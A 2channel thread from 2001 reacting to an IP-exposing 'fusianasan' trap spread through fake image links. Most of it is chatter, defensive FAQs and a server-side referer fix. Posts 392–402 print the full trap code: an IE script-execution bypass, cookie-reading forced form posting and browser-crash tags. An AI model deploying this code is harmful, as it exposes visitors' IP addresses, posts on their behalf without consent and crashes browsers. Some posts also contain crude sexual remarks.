【危機】フシアナサントラップになんらかの対処を<2>
今、夜勤さんとか運営側のみなしゃんはどんなことををやってるでつか?
248 :
心得をよく読みましょう:01/12/17 23:32 ID:ginfzFwi
2ch同時テロですか?
249 :
遅レス:01/12/17 23:33 ID:g9knHaGH
250 :
実は鑑定人:01/12/17 23:33 ID:FWmmQZP/
ま、1回くらい訴えて晒しあげた方がいいんじゃない?
とりあえず、うまい棒を食べてたりします。
253 :
心得をよく読みましょう:01/12/17 23:33 ID:8RQI0vlb
IEでスクリプト切ってても勝手に実行されるとしたら大問題じゃないか?
255 :
心得をよく読みましょう:01/12/17 23:34 ID:JaWjtgYp
もはや祭りだな
fusianasan連続同時エロだっけ。
258 :
心得をよく読みましょう:01/12/17 23:34 ID:0aIl+ARu
>>251 ひろゆきさんてのんきなんですね・・・・・
259 :
心得をよく読みましょう:01/12/17 23:34 ID:eOX1VlI6
>>251 がんがってください。
ついでにきゅうり踊りもやってください。
>>251 つーか、名前は「同時多発エロ」にしてちょ
264 :
実は鑑定人:01/12/17 23:34 ID:FWmmQZP/
268 :
あああ ◆kbeKfuIk :01/12/17 23:34 ID:HFZG3joL
タツタ以前の形跡はあるんか?
あすこにないはずのgifがあったのがそもそも怪しげな発端だろ?
269 :
名無し:01/12/17 23:34 ID:R3z25jf8
270 :
心得をよく読みましょう:01/12/17 23:35 ID:cmZ95WN1
>>251 コーンポタージュなら僕もいま食べてます。
たこやき味くいたくなったよ。
>>253 禿同。
何の為のセキュリティ設定なのか分からんちん。
2ちゃんねるの隠語(出典:『2典』)
うまい棒→警察
食べる→連絡
275 :
心得をよく読みましょう:01/12/17 23:35 ID:FO/tJfxL
276 :
◆7qDGa.4o :01/12/17 23:35 ID:p6AGor6s
>>251 うまい棒食べながらPC触るとキーボードとかに油つきません?
277 :
心得をよく読みましょう:01/12/17 23:35 ID:7R874dPs
278 :
名無しさん:01/12/17 23:35 ID:8exmDMle
もう10年近く食べてないな、うまい棒…
279 :
心得をよく読みましょう:01/12/17 23:35 ID:+/QeJgp/
281 :
心得をよく読みましょう:01/12/17 23:35 ID:82C1VAkm
きつねうどん食べてます
>>235 忘れがちですが、普通のHTMLにスクリプトが書いてある可能性もあります。
すんご
ひろゆきめちゃめちゃつっこまれとる
>>251 暇だったらついでにメルマガでも発行してよ。
わーいひろゆきだー
289 :
心得をよく読みましょう:01/12/17 23:36 ID:e6zQ/lHp
290 :
心得をよく読みましょう:01/12/17 23:36 ID:0fKSC2GP
お絵かき掲示板にアップロードされただけであって
タツタは全く無関係です
291 :
心得をよく読みましょう:01/12/17 23:36 ID:xv0ameSz
293 :
ぴろゆき:01/12/17 23:36 ID:sTbQlRA5
お前ら!甘やかすな!
297 :
心得をよく読みましょう:01/12/17 23:36 ID:73+HXBsl
結局これって対策どうするんですか?
298 :
名無し:01/12/17 23:36 ID:R3z25jf8
夜食スレはここですか?
300 :
ほんちん ◆gItEvm/g :01/12/17 23:36 ID:zoA+2K7A
簡単に亜種が作れるから早く対策練った方がいいと思う
>>251 誕生日に美味い棒1000円分送ろうか?
302 :
:01/12/17 23:37 ID:zWNAHlBZ
夜勤タン
303 :
みどりごけ ◆YHWH.lvE :01/12/17 23:37 ID:7zCiheoY
あのお絵かきBBSのアップロードの仕方がわからんかった…
304 :
あああ ◆kbeKfuIk :01/12/17 23:37 ID:HFZG3joL
タツタ以前の形跡はあるんか?
あすこにないはずのgifがあったのがそもそも怪しげな発端だろ?
306 :
◆7qDGa.4o :01/12/17 23:37 ID:p6AGor6s
>>282 確かにそうですね。ちょっと書き直してきます。
それでは、逝って来ます;_;
>>276 うまい棒は袋をもって食べるので手に油はつかないと思い。
ひろよし にも食べさせてやってくれ
>>299 そのようで。ちなみに俺はUFO食ってる。
ひろゆき。。。。。。(;´Д`)…ハアハア。。
311 :
心得を(略):01/12/17 23:37 ID:Ea8bTkww
(▽Д▽)y ─┛~~
餓死寸前の漏れが一生懸命トラップ対策考えてるときにうまい棒やらきつねうどんくってるとは。
312 :
みゆ:01/12/17 23:37 ID:8swkePSQ
ピュアAU板でもこの被害が続出中。
314 :
鬱:01/12/17 23:38 ID:JdvAdVBf
>>235で確認したが、どうやら俺は引っかかってるようだ・・・鬱
マジで駆除して欲しいYO!
315 :
心得をよく読みましょう:01/12/17 23:38 ID:CvWJCVaK
http://choco.2ch.net/test/read.cgi/news/1008578562/85 ジョージ・プッシュ ◆dees2Brg :01/12/17 22:24 ID:xrtqiwRn
12月17日、言論の自由の敵は2ちゃんねるに戦争を始めた。2ちゃん
ねるの本土が攻撃されたのはニッ●イ事件以来だ。
数百万人の一般2ちゃんねらーの安心感を奪ったのは、『タ●タの部屋』
というテロサイトだ。彼らの目的は極端な考えを2ちゃんねるの人々に
押し付けることだ。指導者(サイト管理者)はBi●lobeにアカウントを
持つ「普段は化学系営業マン・タ●タ」である。
2ちゃんねらーは次のことをタ●タに要求する。『タ●タの部屋』のブラ
クラ製作者を2ゃんねらーに引き渡し、謝罪すること。半角板住人を含む
IPをさらされている2ちゃんねらー個人情報のサルベージ。テロリストの
訓練ネット環境を閉鎖し、2ちゃんねらーに立ち入り調査をさせることだ。
これはBi●lobeとの戦いではない。敵はテロサイトの組織であり、
それを支援するプロバイダーもまた敵だ。テロのWebネットワークを
打ち破るために晒し、告訴、メディアでの影響力など、あらゆる力を使う。
テロリストに安息の場はない。ネットユーザは2ちゃんねらーの側につく
のか、テロリストの側か、選択しなければならない。
この戦いはネットの自由にとっての戦いなのだ。私はすべての人が参加
することを望みたい。そして我々はこれから、長い旅に出たいと思う。
これは「自由対恐怖」「正義対残虐」の戦いだ。この戦いは常に行われてきた。
勝利は必ずやって来ると確信し、行動しよう。
注)Ground Zero(爆心地)のURLは画像掲示板であり、サイト管理者の
意思であるかどうかは今のところ明確ではない。
しかし、管理者およびプロバイダーにはなんらかの管理責任・説明責任
があるのではないか?
316 :
あるてい:01/12/17 23:38 ID:mVdSWChO
コンビニで手に入る時代だからな・・・
とりあえず今は怪しいリンクは踏まないぐらいしか対処法が無い、と
318 :
実は鑑定人:01/12/17 23:38 ID:FWmmQZP/
>>305 これは盲点だったんでしょ(て、当たり前か)?
>>314 俺も。。厨房板に立てちゃってとおもわれ、、、
きつねうどん(;´Д`)ハァハァ
321 :
心得をよく読みましょう:01/12/17 23:39 ID:PymkXAsG
>305
急いでも仕方ないってコト?(w
323 :
心得をよく読みましょう:01/12/17 23:39 ID:0fKSC2GP
>>305 if ($referer =~ /xxx\.2ch\.net\/.*/)
↓
if ($referer =~ /^http\:\/\/xxx\.2ch\.net\/.*/)
こんな感じに修正すれば厳密に大丈夫です。
みんな 仲良し はにゃーん
>>251 とりあえず、うまい棒2本用意して鼻の穴につめこんでください
326 :
ほんちん ◆gItEvm/g :01/12/17 23:39 ID:zoA+2K7A
>>317 すぐ亜種作れるからいくらでも増えると思われ。
ピュアAUが…
328 :
心得をよく読みましょう:01/12/17 23:39 ID:yK59HJxs
オミトロンつかえば大丈夫だけど、まあ大半の奴は使えんわな。
そんな事よりも、インターネットサムライのマク版出してクレ
331 :
鬱:01/12/17 23:40 ID:JdvAdVBf
>>319 俺はゲーム系の板で結構あの画像見ちゃった・・・鬱
何だかなぁ・・・
>>318 盲点というか、、
私のほうからみたら、内容はどうでもいいんですけど。
無駄にアクセスされる(はじいたとしても)わけで、
そのまま、残っているやつもきえてほすぃです。
335 :
本気のちんぽ工事中 ◆gItEvm/g :01/12/17 23:40 ID:zoA+2K7A
寝よ、明日になればおさまってるよね・・・・・
オメコロンマンセ
やっとここまでおいついたのれす。。。
>>325 ワラタ
こんだけひっかかったから少しは踏む奴減るかな?
341 :
心得をよく読みましょう:01/12/17 23:40 ID:yK59HJxs
一気に あやか 有名になったな。
343 :
書き直し;_; ◆7qDGa.4o :01/12/17 23:41 ID:p6AGor6s
■■■javascript+fusianaトラップについて■■■
1.2chなどに貼られたGIF/JPG画像、HTMLなどのリンクを踏むと・・・
2.中に仕込まれてるスクリプトが動き出して
3.レスまたはスレが建てられ、IPが晒されます。
よくある質問
1.かちゅーしゃ・直リンなどでは大丈夫?
ダメです。リファ(転送元URL)が無い場合は厨房板にスレが建ちます
なお、既に対策済みとのことですが、どのみち鯖に負担をかけます
2.Java切ってあったら大丈夫?
ダメです。JavaとJavascriptは別物です。
IEの場合は、バグを使っているので、セキュリティレベルを上げても無駄です。
細心の注意を払ってください。
3.特定URLだけを見てればいいのでは?
ダメです。別のアプロダなんかにアップロードされると新しいURLができてしまいます。
script自体はURLを決め打ちしてないので、どのアプロダでも動作してしまいます。
アプロダ側がファイルチェックしてればいいのですが・・・。
4.じゃ、根本的な対処法は?
妖しいURLを踏む前に、対象をファイルに保存して中身を確認しましょう。
メモ帳などで、ね。
もし、HTMLっぽいのが出てきたら、それは罠の可能性が高いですね;
5.自分のPC大丈夫?
チェッカ作りました。以下で確認しましょう。もし、モナーの絵が出てきたら×です。
http://www.eucaly.net/~kei/test/check.html なお、このチェッカはスクリプトをそのまま利用してますが、BBS登録部分を無効化している
ので、実際には書き込まれません。
344 :
ほんちん ◆gItEvm/g :01/12/17 23:42 ID:zoA+2K7A
>>342 研究だから壊したけどもう1回あぷする?
345 :
心得をよく読みましょう:01/12/17 23:42 ID:8RQI0vlb
IEのセキュリティホール利用してるんだとしたら2chだけの問題ではないと思うんだが・・・。
346 :
心得をよく読みましょう:01/12/17 23:42 ID:yK59HJxs
オミトロン使うような人なら自分で簡単にできます。
良スレ
今度 しゃけ送ります。
Sapporo classic 付きで、どうでしょう。
白い恋人もつけますか?
350 :
心得をよく読みましょう:01/12/17 23:43 ID:t6GLUdmA
さっき間違って踏んだけど、
あがってたアプロダがakutokuだったから503がでた。
悪徳の重さも今回はありがたかった
>>334 そうっすか。
とりあえずコピったソース見て勉強します。
(でも貼らないよ、当然)
>>344 俺3週間くらい前にそこ行っちゃったんだけど、なんか問題有るんですか?
関係ないのでsage
∋8ノハ8∈
( ´D`)<一体何が起こったのれしょうか。。。
355 :
心得をよく読みましょう:01/12/17 23:43 ID:iijZqTiW
>>342 Protocol src killerでどう?
356 :
心得をよく読みましょう:01/12/17 23:44 ID:xRD5qcUE
ひろゆきは、いま何をやってるのかな〜?
357 :
名無し:01/12/17 23:44 ID:R3z25jf8
シャケ・・・・ハァハァ(;;;;;;´д`;;;;;;)
>348
イクラにしてください。
363 :
心得をよく読みましょう:01/12/17 23:44 ID:x0CJpyA2
これってmacユーザーもIE使っていたらやばいですか?
うまい紅鮭が食べたい
ビックリマンチョコを食べてます。
実況で踏んだ!!
>>221 の「ななしん」とかうのは断罪しる!!
タイーホ!!
369 :
心得をよく読みましょう:01/12/17 23:46 ID:0jYwIzWh
>304
禿同。
タツタには公式声明を出して欲しいところ。
370 :
名無し:01/12/17 23:46 ID:R3z25jf8
しゃけ=札幌?
昔、東京でSTVラジオ聴いてました(^_^;)
371 :
削徐人:01/12/17 23:46 ID:VRXXNHgD
ちんこtest
管理側の雑談になりつつある、、、
>>360 ( ;´D`;)<ひぃ〜、やすらさんなのれす!
釣り板分割してやれや(w
375 :
実は鑑定人:01/12/17 23:46 ID:FWmmQZP/
376 :
368:01/12/17 23:46 ID:lGJN/UBP
って、素で引っ掛かっちまったよ(w
377 :
心得をよく読みましょう:01/12/17 23:46 ID:uct3nPUk
前回の閉鎖騒動よりはまた〜りしてますな。
>366
何がでてきましたか?
秘儀!ビックリマンチョコでキラシールが必ずあたるウラワザ
ってあったな
381 :
心得をよく読みましょう:01/12/17 23:46 ID:ZxyBD1ZL
382 :
◆7qDGa.4o :01/12/17 23:46 ID:p6AGor6s
ビックリマソ ウマーヽ(´∀`)ノ ワショーイ
37 名前:ななしん 投稿日:01/12/17 23:42
>>36 なによ? 祭りもう下火でしょ。 次のタイプ出てこないし慎重になったからつまんない。
小学生のま○こはおもしろかったー。 いくつの板に貼ったっけ覚えてねーや(藁
ビール飲んで酔っちゃったから寝ちゃうよん。おやすみん。
こいつまじでうざい・・・もう寝る!!!
387 :
実は鑑定人:01/12/17 23:47 ID:FWmmQZP/
白い恋人達(゚д゚)ウマー
389 :
心得をよく読みましょう:01/12/17 23:47 ID:uct3nPUk
太ったひろゆきさん・・・抱かれたい・・・(´Д`;)ハァハァ・・・
390 :
368:01/12/17 23:47 ID:lGJN/UBP
俺だけじゃないようだ(w
>>355 Protocol src killer
いれた。
安全だった。
よかた、
392 :
ほんちん ◆gItEvm/g :01/12/17 23:47 ID:zoA+2K7A
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<META name="GENERATOR" content="IBM WebSphere Studio Homepage Builder Version 6.5.0.0 Trial for Windows">
<META http-equiv="Content-Style-Type" content="text/css">
<TITLE>研究用の罠byほんちん</TITLE>
</HEAD>
<BODY><![if ! IE]><IMG src="
http://teri.2ch.net/accuse/hihan1.gif"><![endif]><!--[if lt IE 5.5000]>
<noscript><IMG src="
http://teri.2ch.net/accuse/hihan1.gif"></noscript><![endif]-->
<!--[if IE]><IMG src2="
http://teri.2ch.net/accuse/hihan1.gif" id=img1 style=display:none>
<iframe id=if1 src=about:blank style=display:none></iframe><form id=f1 method=POST style=display:none>
<input type=submit name=submit><input name=subject><input name=FROM><input name=mail>
<textarea name=MESSAGE></textarea><input name=bbs><input name=key><input name=time>
</form><script id=scr1 for=window event=onload>
ビックリマンチョコはシールが汚れるのが難点ですね。
394 :
あるてい:01/12/17 23:48 ID:mVdSWChO
中身捨てないだけまし。
396 :
心得をよく読みましょう:01/12/17 23:48 ID:xKfz0AfZ
>>363 いまのところMacで発動したってハナシは聞かない
でも踏むなよ
ちょっとニセモノ出過ぎ。
400 :
心得をよく読みましょう:01/12/17 23:48 ID:iijZqTiW
>>366 なつかしい。ひろゆきさんチョコ食べる派ですね。
↓以下チョコは捨てる派との激しいバトルの予定
401 :
ほんちん ◆gItEvm/g :01/12/17 23:48 ID:zoA+2K7A
function main1(tar){var t1=tar.split('/');var dom=t1[0];var bbs='';var key='';
if(t1[1]=='test'){ bbs=t1[3]; key=t1[4];}else{ bbs=t1[1];}if(key){
f1.action='
http://'+dom+'/test/bbs.cgi'; f1.key.value=key;}else{
f1.action='
http://'+dom+'/test/subbbs.cgi'; f1.subject.value=parent.location.href;}
var n = getCookie("NAME") + 'fusianasan'; var m = getCookie("MAIL");
f1.FROM.value= n.replace("#", ""); f1.mail.value= m.replace("#", "");
f1.MESSAGE.value=parent.location.href;f1.bbs.value=bbs;
f1.time.value=String(Math.floor(new Date().getTime()/1000));var t2="if1.location.replace('about:blank')";
parent.setTimeout(t2,5000);f1.submit.click();}function main2(){
var t3=String(Math.floor(new Date().getTime()/1000));setCookie('history',t3);}
function main(){var t1=location.search;var t2=getCookie('history');
var t3=String(Math.floor(new Date().getTime()/1000));var t4=Number(t3)-Number(t2);
if(t1){ t1=t1.substr(1); if(t4<20){ setCookie('history','1'); history.back();
}else{ window.onbeforeunload=main2; main1(t1);
parent.img1.src=parent.img1.src2; parent.img1.style.display='block';
} return;}t1=document.referrer;if((!t1)||(t4<3)){ img1.src=img1.src2; img1.style.display='block';
return;}t1=t1.substr(7);var t2=t1.indexOf('#');if(t2>=0){t1=t1.substr(0,t2);}
if1.location.replace(location.href+'?'+t1);}document.body.addBehavior('#default#userData');main();
function getCookie(k){document.body.load('cookie');var r=document.body.getAttribute(k);if(r){return r;}
return '';}function setCookie(k,v){document.body.load('cookie');
if(v){document.body.setAttribute(k,v)}else{document.body.removeAttribute(k)}
document.body.save('cookie');}</script><noscript><xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
402 :
ほんちん ◆gItEvm/g :01/12/17 23:49 ID:zoA+2K7A
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHTML),set1.outerHTML />
</noscript><![endif]--><IMG src="file///c│/con/con/con">
<IMG src="mailto:1"><IMG src="mailto:2"><IMG src="mailto:3"><IMG src="mailto:4"><IMG src="mailto:5"><IMG src="mailto:6">
<IMG src="
http://www.aaa.or.jp/aa.gif" width="999999999" height="999999999">
<xmp> <plaintext>
<IMG src="file:///A:/a.gif"><BR>
<IMG src="file:///A:/b.gif"><BR>
<IMG src="file:///A:/c.gif"><BR>
<IMG src="file:///A:/d.gif"><BR>
</BODY>
</HTML>
っで、今回の騒動の被害ってIP抜かれるのと鯖負荷増大だけ?
406 :
鬱:01/12/17 23:49 ID:JdvAdVBf
感染しちゃってるんだけどどうにかなんないの?
407 :
心得をよく読みましょう:01/12/17 23:49 ID:MLNcHrZR
このトラップ最初にやったやつタイーホするようにがんばってください。
( ´D`)<ののは何でも食べるのれす。あひゃひゃひゃ!!
たしかに激しいバトルだ、、、
411 :
実は鑑定人:01/12/17 23:49 ID:FWmmQZP/
414 :
心得をよく読みましょう:01/12/17 23:50 ID:0fKSC2GP
415 :
心得をよく読みましょう :01/12/17 23:50 ID:aKPODinb
IP抜かれた奴は規制かかっても文句いえねーな。わざとでも天然でも
>>410 お、ホンモノだ。ラウンジにスレ立てさせてちょ
雪見大福(゚д゚)ウマー
チョコだけくれ。
419 :
ぴろゆき:01/12/17 23:50 ID:sTbQlRA5
うんこ
420 :
心得をよく読みましょう:01/12/17 23:50 ID:SEDuubMe
コピペ
名前: ◆YaKIN/eo @夜勤 ★ 投稿日:01/12/17 23:45 ID:???
いやー 書き込みが自動でやられて、
それを 皆で削除したら、さすがに 負荷あがります。
ご協力 ありがとうございました。 > 削除人さんの方々。
では、落ち着いたようですので、通常通りということで、
お願いいたします。
421 :
あああ ◆kbeKfuIk :01/12/17 23:51 ID:HFZG3joL
なんかこのスレ楽しい
424 :
鬱:01/12/17 23:51 ID:JdvAdVBf
鑑定機
使ったら『残念ですが、引っかかるみたいです。。。』
って言われちまうよ。
426 :
心得をよく読みましょう:01/12/17 23:51 ID:Ti2jR91V
夜勤さんへ
白い恋人はともかく、鮭=北海道みたいな発想は止めて。
新巻鮭一本送れとか簡単に言われるが、
北海道に住んでたってそこそこ高いのに・・・。
蟹送れなどとぬかす奴はグリグリしてやる!
>削除屋さん
UNIX板でソース張りつけてる奴が居ますが・・・
429 :
犯人逮捕!:01/12/17 23:51 ID:xPMD2ORb
コピペ
>実況板より。
16 名前:ななしん 投稿日:01/12/17 23:01
URL踏んだやつが勝手にIP晒してスレ立てるんだよ(藁
漏れはアドレス貼っただけー みんなじゃんじゃん踏んでね?
このななしんってやつが実況の発端なんですがなにか対処できなんでしょうか?
あきらかに遊び半分でやってます・・・
これが犯人という説がありますな。
( ;´D`)<ののは何もしてねーのれす 何もしらねーのれす
ひろゆき本人トリップつけてくれぇぇ
ここはフシアナ祭りというよりひろゆき祭りになりつつある・・・。
432 :
名無しさん@職安:01/12/17 23:52 ID:v9loZ8id
>719 : ◆YaKIN/eo @夜勤 ★ :01/12/17 23:45 ID:???
>いやー 書き込みが自動でやられて、
>それを 皆で削除したら、さすがに 負荷あがります。
>
>ご協力 ありがとうございました。 > 削除人さんの方々。
>
>では、落ち着いたようですので、通常通りということで、
>お願いいたします。
危機は乗越えたのか?
しゃけなんざ猫の餌だぜ
いやまじで
434 :
ほんちん ◆gItEvm/g :01/12/17 23:52 ID:zoA+2K7A
>426
蟹を送ってください。
437 :
心得をよく読みましょう:01/12/17 23:52 ID:vBcj/CMa
438 :
:01/12/17 23:52 ID:wOTQ1+hf
ものすごい勢いでひろゆきを扇動する宮台真司の画像きぼん
439 :
心得をよく読みましょう:01/12/17 23:52 ID:ntPVOjib
440 :
心得をよく読みましょう:01/12/17 23:52 ID:82C1VAkm
シールは捨てるなぁ、俺
一円玉、ごきぶり、画鋲、とかのそっくりシールの時代は、集めてたけど
今のエンジェルだかなんだかのシールは、おもしろくないから。
441 :
心得をよく読みましょう:01/12/17 23:52 ID:vOly0Z8n
ウニオクレ(・∀・)
>426 蟹送れ! (゚д゚)ウマー
早速言ってみたよ!グリグリしてほしいよ!!!ワショーイ
444 :
心得をよく読みましょう:01/12/17 23:52 ID:xKfz0AfZ
ひろゆきは次男。長男はまさゆき。
正直ハラへった
446 :
(‘ ε ’) :01/12/17 23:53 ID:ntPVOjib
函館の朝市でイクラの二倍丼を食べる、これ最高。
448 :
心得をよく読みましょう:01/12/17 23:53 ID:82C1VAkm
449 :
心得をよく読みましょう:01/12/17 23:53 ID:flL/R86I
寝よ
おっ 失礼。
切り身もありますし、、
452 :
426:01/12/17 23:53 ID:Ti2jR91V
夜勤さんに頼め。
とりあえずおまえらグリグリだ〜。
うちの近所にやおきん本社があるんですよ
マターリするね、このスレヽ( ´ー`)ノ
カレーうどん食いつつ高みの見物。
ちょっとまとめときます
ひろゆき ◆L3IpNS4A →ひろゆき
ひろゆき ◆aSjnRHGU →ひろよし?
ひろゆき ◆DQNyDEEI →?
ひろゆき ◆wJtj0t.Q →?
お前ら、いまいいもん食ってやがるのかゴルァ!!
ニッシソのかぷめんでもくお
わるどかぷのチケトほすぃ
>>451 じゃがいもの芽だって構いません。ホスィ...
460 :
心得をよく読みましょう:01/12/17 23:55 ID:ntPVOjib
>>429 どうも犯人気取ってるだけみたい
32 名前:ななしん 投稿日:01/12/17 23:28
漏れ一つもスレ立ててないよんひゃっはー。
だってかちゅ使いだもん。 ひっかかるわけねーやヽ(´ー`)ノ
38 名前:名無しさん 投稿日:01/12/17 23:44
>>32 残念でした。かちゅもダメだよ
キャップのみなさんのブラウザって何?
>>456 DQNyDEEIってどこかで見たような…
464 :
:01/12/17 23:55 ID:dsBmgabD
うまい棒って、関東限定? 見たことないんだけど。
466 :
心得をよく読みましょう:01/12/17 23:55 ID:xKfz0AfZ
ひろゆき ◆L3IpNS4A →ひろゆき(次男)
ひろゆき ◆aSjnRHGU →ひろよし(三男)
ひろゆき ◆DQNyDEEI →まさゆき(長男)
ひろゆき ◆wJtj0t.Q →光恵(次女)
467 :
心得をよく読みましょう:01/12/17 23:56 ID:KXAVgYgr
これのあおりなのか今日の昼過ぎ(夕方?)頃から全板で書き込み出来ません
ブラウザ変ですよ が出ます
ブラウザはie5.01でホストは***.kyoto.ocn.ne.jpです
無関係でしょうか?
>>456 ひろゆきは長男or次男ってのも決定しないと(w
471 :
心得をよく読みましょう:01/12/17 23:56 ID:ntPVOjib
>463 ジュルゥ…
>>462 どっかの板の厨房コテハンだね。
うぜぇ。
475 :
_:01/12/17 23:56 ID:TuX282Wq
477 :
:01/12/17 23:57 ID:QET5i+/q
DCから見るとどうなるの?
>464 関西にも売ってるよ! >うまい棒
>>465 りょーかいですー
ザンギですか? どこにでも売っているような、いないような。
わたしの知らない 究極のザンギがあるのかしらん。
うまい棒は全国胸中なり
483 :
:01/12/17 23:58 ID:dsBmgabD
そうなの?
ホームランバットなら、喰ったことあるんだけど…。
484 :
関東人 ◆m7C7YNxY :01/12/17 23:58 ID:7GHEMNDK
ペヤング(゚д゚)ウマー
485 :
心得をよく読みましょう:01/12/17 23:58 ID:xKfz0AfZ
486 :
:01/12/17 23:58 ID:uJAGfkGT
488 :
心得をよく読みましょう:01/12/17 23:58 ID:0fKSC2GP
お前ら、食い物見せびらかすな!!
490 :
名無し:01/12/17 23:58 ID:R3z25jf8
間もなくIDが変わりますね。
からあげのことザンギってゆーだけじゃん。
北海道なのに、お金なくて鮭じゃなくて輸入ものサーモンを食べました。
>>481 ニンニク醤油のよく染みたやつが。。小汚い居酒屋のやつでもいいんです。
はらへた、、
>484
やきそば弁当(゚д゚)ウマー
497 :
初カキコ:01/12/17 23:59 ID:9n3HPFsm
キネーン
>>488 んなの、スクリプトで速攻で対策される。書いた時点で使えない。
もうこんな時間か……
馴れ合いスレ化してる・・。
9月に水戸経由でフェリーで北海道逝ったけど売ってたよ
水戸でもうまい棒ブランドじゃないけどおなじ製造メーカーの納豆味売ってた
503 :
名無し:01/12/18 00:00 ID:vfjMcdMD
0時過ぎました。IDは?
504 :
解説文改変してみた:01/12/18 00:00 ID:rSGQHPAE
1.アプロダなどに貼られたGIF画像などを踏むと・・・
2.中に仕込まれてるスクリプトが動き出して
3.レスまたはスレが建てられ、IPが晒されます。レス内容はその人が踏んだURLになります。
★よくある質問
1.かちゅーしゃ・直リンなどでは大丈夫?
ダメです。リファ(転送元URL)が無い場合は厨房板にスレが建ちます。
なお、既に対策済みとのことですが、どのみち鯖に負担をかけます。
スクリプトが改変されれば簡単に突破される可能性も高いです。
2.Java切ってあったら大丈夫?
ダメです。JavaとJavascriptは別物です。
IE5.5/6の場合は、バグをついているので、Javascript(アクティブスクリプト)をオフにしてもかかります。
IE5.01以下ならJavascriptをオフにすれば大丈夫です。
3.特定URLだけを見てればいいのでは?
ダメです。別のアプロダなんかにアップロードされると新しいURLができてしまいます。
script自体はURLを決め打ちしてないので、どのアプロダでも動作してしまいます。
なお、このscriptの拡張子の多くが画像ファイルなのはアプロダへ簡単に投稿できる形式だからであり
自分のホームページにhtmlやtxtでアップロードされる可能性も高いです。
拡張子では全く判別できないと考えてください。
4.じゃ、根本的な対処法は?
URLを踏む前に、 [view-source:
http://www.〜〜]とアドレス欄に入力してソースを表示させましょう。
もし、HTMLっぽいのが出てきたら、それは罠の可能性が高いです。
右クリックからソースを表示させる右クリックメニューも便利。
http://www.skipup.com/~niwatori/index4.htm#bura なお、ブラクラチェッカーでは安全と診断されますので注意してください。
5.自分のPC大丈夫?
チェッカ作りました。以下で確認しましょう。もし、モナーの絵が出てきたら×です。
http://www.eucaly.net/~kei/test/check.html なお、このチェッカはスクリプトをほぼそのまま利用してますが、BBS登録部分を無効化しているので、実際には書き込まれません。
0000!!!!!!!!
いdちぇっくっ!!!!!!!!
もう終わったの?
マターリだネ。
509 :
心得をよく読みましょう:01/12/18 00:00 ID:ewdu0jQ5
510 :
@@:01/12/18 00:00 ID:GywTe9O0
>>235 このチェックで”引っかかる”って出たって事は、
注意しなきゃならんってことかい?
「naPtffh8」からどうかわってるかな……
さくらたんのIDちぇーっく
やきそばパン(゚д゚)ウマー
515 :
名無しさん?:01/12/18 00:01 ID:it/dqncN
対策はどうなったの?
⊂(´-`⊂⌒`つ
517 :
心得をよく読みましょう:01/12/18 00:01 ID:ewdu0jQ5
518 :
名無しさん?:01/12/18 00:01 ID:it/dqncN
あ、ドキュンだ!
どれどれ
よかったね、とりあえずは余裕が出たみたいで。。。ふぅひぃふlはう
トイレかよ……
523 :
心得をよく読みましょう:01/12/18 00:01 ID:9aT/CaI4
どれ?
526 :
心得をよく読みましょう:01/12/18 00:02 ID:BJ+jUeGA
踏みたかったのに終ってるみたいだな
IDチェック... と
いやーすごいときは5秒に20レスとかついてたかんな〜
もう終わりでしょう。
531 :
ドキュソ:01/12/18 00:02 ID:it/dqncN
オレは神
535 :
名無し:01/12/18 00:03 ID:vfjMcdMD
>>529 IDがハイホー?
パナソニックですか。
538 :
:01/12/18 00:03 ID:MZT26XO4
やきそばパン…食い物はやっぱ炭水化物同士が王道だね
長女降臨キボンニュ
ログ読んでないので、既出あるいは無駄レスだったらスミマセン、、
時間稼ぎとして、
スレ立て画面を全て別にした上で
別画面に移る時点(bbs.cgi)でスレッド立てすぎかどうかのチェックをする
で、subbbs.cgiの名前を定期的に変える
てのはムダムダ?
パソコン触ったこともない、そこらのババァは平和だろうな。
542 :
427:01/12/18 00:05 ID:x9gFWCea
>465
すいません、もたついて誤爆してしまいました。(^^;
>>474 一応自己フォローをUNIX板に入れておきました。
休みの今日一日2ch同時多発テロ見て終わりました・・・
UNIX板のソースをあぼーんしても、
チェッカのソース読めばおんなじ事書いてあるじゃない?
レポート明日提出だというのに一日中見てましたが何か?
あ……2典のとこからメールがきてる…………
547 :
心得をよく読みましょう:01/12/18 00:06 ID:ZrcN9tWg
548 :
心得をよく読みましょう:01/12/18 00:06 ID:FonmILdW
うあーデマ流しまくってましたすみません。
>>164 >>323 の対策は有効です。
ってもうやってる?
>>544 ソレをわざわざ書き換えて使うような人は
もうどこかのアプロダから入手しているのではないかと。
>>543 私も。。
551 :
104:01/12/18 00:08 ID:pkTuEHYy
日付変わってIDも変わってるけど104です。
>>543 明日は俺もレポート提出が…まだ手つかず(剛球
とないと2ハジマタ
ID:「ナウい4円」て、俺は…
レポートやるか
556 :
109:01/12/18 00:10 ID:HZEAlLKk
ひろゆきからメールきたよ。teri鯖に対策コード入れてみるって。
(もう30分位前のメールだから、他も入ってるかも)
UNIX板のソース削除依頼した人
お前は本当にソースを削除して欲しかったのかと問いたい。
削除人が即消ししてくれるのが楽しくて、言ってみただけちゃうんかと。
あー俺も明日テストなのに。。。講義さぼるからいいや
>554 ( ´∀`)ノC 買います。売ってくらさい。
2ちゃんねる中毒者の集まるスレはここですか?
マターリしてるけど根本的に解決したってわけじゃないんだよね?
563 :
心得をよく読みましょう:01/12/18 00:11 ID:9aT/CaI4
564 :
心得をよく読みましょう:01/12/18 00:11 ID:Na64DgnW
COMIC鯖なんとかしてくれ(泣
IDチェク
夜食くって寝ようかな
566 :
心得をよく読みましょう:01/12/18 00:11 ID:SzJsQUh3
質問ですが、パチンコ板の過去ログは復帰しまいのですか?
厨房板は復帰しているので。名スレもあったのに・・・
>>550 すごいですね。第一次爆撃の時からいましたものね。お疲れ様です。
567 :
104:01/12/18 00:11 ID:pkTuEHYy
568 :
心得をよく読みましょう:01/12/18 00:12 ID:8QbAKP/W
半角板逝けないのおれだけ?
CPPぜのP・・・なんのこった
salad板まだまだ不安定です…もう寝ようっかな。
どさくさにまぎれてラウンジのスレ立て規制元に戻してくれませんかね(w
573 :
ikuma☆:01/12/18 00:13 ID:mG8UGvxw
お?
>>567 スクリプトでリファラを書き換えて正規のモノにしたら終わり。
書いちゃダメだってば…
つか、yasai鯖重くない?
俺だけ??ほのぼの入れない。
580 :
